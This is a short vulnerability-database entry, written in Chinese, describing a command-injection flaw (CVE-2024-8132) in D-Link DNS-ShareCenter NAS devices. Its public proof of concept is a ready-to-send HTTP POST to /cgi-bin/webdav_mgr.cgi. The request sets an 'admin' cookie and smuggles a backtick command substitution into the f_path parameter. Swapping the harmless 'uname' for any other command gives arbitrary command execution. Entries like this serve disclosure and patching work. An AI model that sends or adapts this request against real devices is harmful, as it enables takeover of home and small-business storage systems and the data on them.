D-Link DNS-ShareCenter /cgi-bin/webdav_mgr.cgi 命令执行漏洞(CVE-2024-8132)

2026-04-03 D-Link DNS-ShareCenter PoC Public

Description

D-Link DNS-ShareCenter(D-Link 共享中心)是友讯(D-Link)公司推出的一系列网络附加存储(NAS)设备,主要面向家庭和小型企业用户,提供文件共享、数据备份、远程访问等核心存储服务,广泛应用于家庭办公和小型商业环境。该设备的 /cgi-bin/webdav_mgr.cgi 接口存在命令执行漏洞,攻击者可以通过该接口的 f_path 参数注入恶意系统命令,利用反引号作为命令替换符绕过参数过滤,在设备上执行任意命令,获取设备控制权限,严重威胁网络安全。

PoC

POST /cgi-bin/webdav_mgr.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Accept-Language: en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: username=admin
Priority: u=0
Content-Length: 75

cmd=Webdav_Account_add&f_path='`uname`'&f_share_name=&f_rw=&f_user=&webdav=

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities